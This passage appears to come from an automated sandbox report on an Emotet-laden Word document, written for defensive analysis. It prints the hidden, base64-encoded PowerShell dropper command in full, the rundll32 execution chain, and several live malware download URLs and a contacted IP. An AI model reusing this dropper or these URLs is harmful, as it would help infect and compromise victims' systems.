wAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004C5A cpuid

7_2_10004C5A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

7_2_10007D46

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer13	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting32	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information3	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Scripting32	Security Account Manager	System Information Discovery26	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Security Software Discovery31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol23	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter211	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell4	Rc.common	Rc.common	Masquerading21	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pack 2254794.doc	30%	Virustotal		Browse
pack 2254794.doc	33%	ReversingLabs	Document-Excel.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.rundll32.exe.1e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.230000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.190000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.230000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.240000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
petafilm.com	6%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://petafilm.com	6%	Virustotal		Browse
http://petafilm.com	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/	5%	Virustotal		Browse
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/	0%	Avira URL Cloud	safe
http://5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/	0%	Avira URL Cloud	safe
https://somanap.com/wp-admin/P/	0%	Avira URL Cloud	safe
https://fnjbq.com/wp-includes/rlR/	100%	Avira URL Cloud	malware
http://wap.zhonglisc.com/wp-includes/QryCB/	100%	Avira URL Cloud	malware
http://petafilm.com/wp-admin/4m/	100%	Avira URL Cloud	malware
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/	100%	Avira URL Cloud	malware
http://givingthanksdaily.com/qlE/VeF/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
petafilm.com	176.53.69.151	true	true	6%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/	true	Avira URL Cloud: safe	unknown
http://petafilm.com/wp-admin/4m/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	false		high
http://petafilm.com	powershell.exe, 00000005.00000002.2106127906.0000000003B33000.00000004.00000001.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
